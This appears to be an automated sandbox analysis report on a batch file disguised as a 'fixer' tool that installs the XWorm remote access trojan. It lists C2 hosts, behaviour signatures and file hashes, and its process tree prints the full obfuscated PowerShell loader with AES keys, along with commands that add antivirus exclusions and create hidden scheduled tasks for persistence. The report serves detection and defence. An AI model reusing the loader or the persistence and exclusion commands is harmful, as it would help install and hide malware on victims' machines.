Analysis

  • max time kernel
    1782s
  • max time network
    1155s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win11-20241007-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    12-11-2024 06:18

General

  • Target

    NLHybrid Fixer.bat

  • Size

    291KB

  • MD5

    734fdc5c211a7b1fe3a5101c3b0aafd6

  • SHA1

    3d8b84678e674a5b4b49ad4ee4669179d16b75d0

  • SHA256

    0682cfbf0f7c1425a627a847a7cfbc9d3c7633d8426b6f7800d81e391528167b

  • SHA512

    92b2af4e5dbdeefdad102696b8b6d85c10c2885d0e1bfb3d9b94c0ef8e1dafa488f8c8688504b8cb76e244f6abcd3f093e817f5767ae16daed89f80fcbb1db18

  • SSDEEP

    6144:uoiULBMXvSD+eFkX0TupDOYvaktWHHvdTNb71M943xw:uLULBM47FNuNOWaxvH7m43a

Malware Config

Extracted

Family

xworm

Version

5.0

C2

remote-newest.gl.at.ply.gg:62113

fund-scared.gl.at.ply.gg:62113

Mutex

UrM5eoX12ULh6st6

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    win64updater.exe

aes.plain

Signatures

  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run PowerShell and hide display window.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 58 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 44 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:6140
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('15dPngye8xc2zrvtzV/w74aCqiEwBCPIQU+QvJpDDdI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rYfQCcxwv9En0wj3TE+fMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AIFyt=New-Object System.IO.MemoryStream(,$param_var); $lMkeE=New-Object System.IO.MemoryStream; $SZECh=New-Object System.IO.Compression.GZipStream($AIFyt, [IO.Compression.CompressionMode]::Decompress); $SZECh.CopyTo($lMkeE); $SZECh.Dispose(); $AIFyt.Dispose(); $lMkeE.Dispose(); $lMkeE.ToArray();}function execute_function($param_var,$param2_var){ $tWijb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZXwwn=$tWijb.EntryPoint; $ZXwwn.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat';$GwBNZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat').Split([Environment]::NewLine);foreach ($aCkBV in $GwBNZ) { if ($aCkBV.StartsWith(':: ')) { $ggoTJ=$aCkBV.Substring(3); break; }}$payloads_var=[string[]]$ggoTJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:224
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_675_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_675.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1700
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_675.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:6060
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_675.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1500
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('15dPngye8xc2zrvtzV/w74aCqiEwBCPIQU+QvJpDDdI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rYfQCcxwv9En0wj3TE+fMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AIFyt=New-Object System.IO.MemoryStream(,$param_var); $lMkeE=New-Object System.IO.MemoryStream; $SZECh=New-Object System.IO.Compression.GZipStream($AIFyt, [IO.Compression.CompressionMode]::Decompress); $SZECh.CopyTo($lMkeE); $SZECh.Dispose(); $AIFyt.Dispose(); $lMkeE.Dispose(); $lMkeE.ToArray();}function execute_function($param_var,$param2_var){ $tWijb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZXwwn=$tWijb.EntryPoint; $ZXwwn.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_675.bat';$GwBNZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_675.bat').Split([Environment]::NewLine);foreach ($aCkBV in $GwBNZ) { if ($aCkBV.StartsWith(':: ')) { $ggoTJ=$aCkBV.Substring(3); break; }}$payloads_var=[string[]]$ggoTJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2864
            • C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.exe
              "C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.exe"
              6⤵
              • Executes dropped EXE
              PID:1820
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:392
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4984
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\win64updater.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4868
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'win64updater.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5432
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "win64updater" /tr "C:\Users\Admin\win64updater.exe"
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:1032
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /delete /f /tn "win64updater"
              6⤵
              PID:4308
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2D06.tmp.bat""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:5576
              • C:\Windows\system32\timeout.exe
                timeout 3
                7⤵
                • Delays execution with timeout.exe
                PID:3764
    • C:\Windows\system32\sihost.exe
      sihost.exe
      1⤵
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\explorer.exe
        explorer.exe /LOADSAVEDWINDOWS
        2⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        PID:2932
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:340
    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
      1⤵
      • Enumerates system info in registry
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:1776

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      df472dcddb36aa24247f8c8d8a517bd7

      SHA1

      6f54967355e507294cbc86662a6fbeedac9d7030

      SHA256

      e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

      SHA512

      06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      43ad82ca3274b72e28dc2d04c3046121

      SHA1

      80a42ea602f8d099875b5db8842b5279985b473e

      SHA256

      0cd0a6b663fe01f35131d05f397d50acfbcf96e739fd5ee6cd6c9d0830a12766

      SHA512

      ab0348ecbb9c50960a2648304e51640cc28b63d7680d842b59448f58e093a39ba4bb1a0760d32365bc82ac456e1a6a26e0ce69ded3bbf2fe3755ab7ae2e6d8dd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      4b86e1a9a1b724c301725579ce442d5e

      SHA1

      971d09bd61f83b5371c9bab1d5b879b714f5799a

      SHA256

      8ef66efbcdc121e86d296c2c4569893799a9fc2e24817268a4e612247ff0a5ca

      SHA512

      71b5e4152d708e1d89de954194d2b6d6d0c93a0c2e4b677cd8e15c569885c9b4a6a196852176e44647f7ca29e8e67cccb848961b5fba1326f997ef18a719f303

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      59d37a8c588c83e806678c7fb5d1229f

      SHA1

      4396d68567f30f08e08a269802fe3f4784b88c5b

      SHA256

      c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84

      SHA512

      19223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      05b3cd21c1ec02f04caba773186ee8d0

      SHA1

      39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

      SHA256

      911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

      SHA512

      e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      4397b0d1a82fec8a95f1ab53c152c5a5

      SHA1

      3632ed4f2b65fd0df29b3d3725e3a611d2e1adf7

      SHA256

      10cece13749ac090c815e53dc5e248b4b9c3ba93dc3d434d97d22f12a3906734

      SHA512

      f0d21ab75d08e1cb4ac83507f9ca41ef5365027b0d7e27747ded44b76fdb0346ca2d7499697802c5b67696e0c73716fcfab698825a143515151001690804d59f

    • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\4NTU84VM\www.bing[1].xml

      Filesize

      17KB

      MD5

      a935ae0880d304d4d1577e8a6bafa91f

      SHA1

      779785719e328f0a8240a63579a2a65dab78331f

      SHA256

      4796730a7b290acbe68b998de293cfc94e62e3e58dff72331ed77323dff30ecc

      SHA512

      6ae124492b913f6acc3734883fbc446c64ff434f76059fcbb6c7bdc38fb073ddb6ea7f6e4c1aaf1e8b32bb6391028b08fbbc1ddf9ea2cb237930524f1a40324d

    • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\4NTU84VM\www.bing[1].xml

      Filesize

      15KB

      MD5

      bca5ea8c3d0e4480defffadd44444022

      SHA1

      27f329f669c8e726f6603366b2108288a00190ae

      SHA256

      cf28ff3651efb21556cfe276cc31fa5fcade01ada1e6a39a120ba4edb68541bc

      SHA512

      892f4d64ea201341e5172c075b87675974291c3bb5048b7fb99e9f381a8bbdc3a4d4335dc82148bc278cfd58202151daafbecb16c70f0685ec661f6e73cd0997

    • C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.exe

      Filesize

      42KB

      MD5

      269085c7755574a5cd840b298a0b4a55

      SHA1

      3b20a9f3c0e5ed34d37c5c915c07fd93da7d7cbd

      SHA256

      ee94f31406ba029502b3737f9d2c2d2d22448643deaa3095239a55b58b9169c8

      SHA512

      47b5782e53cf03bb5eb8f96584b9e0608bc10038b8721761bf67af75ed0b77a2e51ef94a9d62302e6e0d45885e72d47b80815caa8c063a616d50b646885b5f65

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1jc2qfmf.gwp.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\tmp2D06.tmp.bat

      Filesize

      171B

      MD5

      4d6a27452d8050d1ca910525357fe212

      SHA1

      745c9e9f77d888b323ded0fa17dbbc056089966f

      SHA256

      0bcc3460724246090263527745e3cb50340cff7fa831e739c435a78c42cc199d

      SHA512

      de09800de28358cde68ccf4609f08d168c15f940e771bc4f2a3b95f80a27826c7eb8346040f10b8a2ffc652dd9feb945b64bd15a999140562421375f9c8c364e

    • C:\Users\Admin\AppData\Roaming\startup_str_675.bat

      Filesize

      291KB

      MD5

      734fdc5c211a7b1fe3a5101c3b0aafd6

      SHA1

      3d8b84678e674a5b4b49ad4ee4669179d16b75d0

      SHA256

      0682cfbf0f7c1425a627a847a7cfbc9d3c7633d8426b6f7800d81e391528167b

      SHA512

      92b2af4e5dbdeefdad102696b8b6d85c10c2885d0e1bfb3d9b94c0ef8e1dafa488f8c8688504b8cb76e244f6abcd3f093e817f5767ae16daed89f80fcbb1db18

    • C:\Users\Admin\AppData\Roaming\startup_str_675.vbs

      Filesize

      115B

      MD5

      a6b8621a58566d89d4baf39dfa89ee51

      SHA1

      211f69e1aaa7545b66dfcc3443c44cb47ad82183

      SHA256

      ab78978b0e9d52d2e014fafcb4cdc0ff1f8f1ac368aa66c437facd5ee32c6763

      SHA512

      2d0cff3fb9bd3b1472acb69d47066d2dbab76891d229cd8047a2e6aeef480fadb689cfe57e1b72d6807deaac17a937127f7d6bdecd570d1a229409ebc3cf76ce
